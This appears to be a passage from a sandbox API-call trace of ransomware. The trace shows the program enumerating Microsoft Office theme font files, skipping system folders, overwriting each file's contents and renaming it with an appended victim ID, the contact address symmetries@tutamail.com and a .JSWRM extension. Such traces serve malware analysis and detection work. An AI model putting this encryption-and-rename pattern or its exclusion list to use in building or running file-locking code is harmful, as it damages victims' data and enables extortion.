hHeap=0x1e0000) returned 1 [0101.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0101.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0101.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond-TrebuchetMs.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond-trebuchetms.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.143] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3540) returned 1 [0101.143] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x206858 [0101.143] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdd0, lpOverlapped=0x0) returned 1 [0101.145] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.145] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdd0, lpOverlapped=0x0) returned 1 [0101.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.145] CloseHandle (hObject=0x314) returned 1 [0101.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0101.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0101.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0101.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0101.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0101.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond-TrebuchetMs.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond-trebuchetms.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond-TrebuchetMs.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond-trebuchetms.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0101.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0101.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0101.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0101.147] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdbd, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Garamond.xml", cAlternateFileName="")) returned 1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2=".") returned 1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="..") returned 1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="...") returned 1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="windows") returned -1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="recovery") returned -1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="perflogs") returned -1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="documents and settings") returned 1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="system volume information") returned -1 [0101.147] lstrcmpiW (lpString1="Garamond.xml", lpString2="msocache") returned -1 [0101.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0101.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond.xml", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garamond.xml", lpUsedDefaultChar=0x0) returned 12 [0101.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0101.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0101.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond.xml", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garamond.xml", lpUsedDefaultChar=0x0) returned 12 [0101.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0101.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0101.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0101.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.148] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3517) returned 1 [0101.148] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdb0) returned 0x206858 [0101.148] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdb0, lpOverlapped=0x0) returned 1 [0101.149] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.150] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdb0, lpOverlapped=0x0) returned 1 [0101.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.150] CloseHandle (hObject=0x314) returned 1 [0101.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0101.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0101.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0101.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0101.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0101.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0101.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0101.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0101.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0101.151] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc2, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Georgia.xml", cAlternateFileName="")) returned 1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2=".") returned 1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="..") returned 1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="...") returned 1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="windows") returned -1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="recovery") returned -1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="perflogs") returned -1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="documents and settings") returned 1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="system volume information") returned -1 [0101.151] lstrcmpiW (lpString1="Georgia.xml", lpString2="msocache") returned -1 [0101.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Georgia.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Georgia.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Georgia.xml", lpUsedDefaultChar=0x0) returned 11 [0101.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0101.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Georgia.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Georgia.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Georgia.xml", lpUsedDefaultChar=0x0) returned 11 [0101.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0101.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0101.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0101.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Georgia.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\georgia.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.152] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3522) returned 1 [0101.152] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc0) returned 0x206858 [0101.152] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdc0, lpOverlapped=0x0) returned 1 [0101.154] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.154] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdc0, lpOverlapped=0x0) returned 1 [0101.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.154] CloseHandle (hObject=0x314) returned 1 [0101.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0101.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0101.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0101.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0101.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0101.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0101.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.155] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Georgia.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\georgia.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Georgia.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\georgia.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0101.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0101.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0101.155] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x115da4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea1, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Gill Sans MT.xml", cAlternateFileName="GILLSA~1.XML")) returned 1 [0101.155] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2=".") returned 1 [0101.155] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="..") returned 1 [0101.155] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="...") returned 1 [0101.155] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="windows") returned -1 [0101.155] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="recovery") returned -1 [0101.156] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="perflogs") returned -1 [0101.156] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="documents and settings") returned 1 [0101.156] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.156] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="system volume information") returned -1 [0101.156] lstrcmpiW (lpString1="Gill Sans MT.xml", lpString2="msocache") returned -1 [0101.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gill Sans MT.xml", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gill Sans MT.xml", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Gill Sans MT.xml", lpUsedDefaultChar=0x0) returned 16 [0101.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gill Sans MT.xml", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0101.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gill Sans MT.xml", cchWideChar=16, lpMultiByteStr=0x241178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Gill Sans MT.xml", lpUsedDefaultChar=0x0) returned 16 [0101.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0101.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0101.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0101.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Gill Sans MT.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\gill sans mt.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.157] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3745) returned 1 [0101.157] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xea0) returned 0x206858 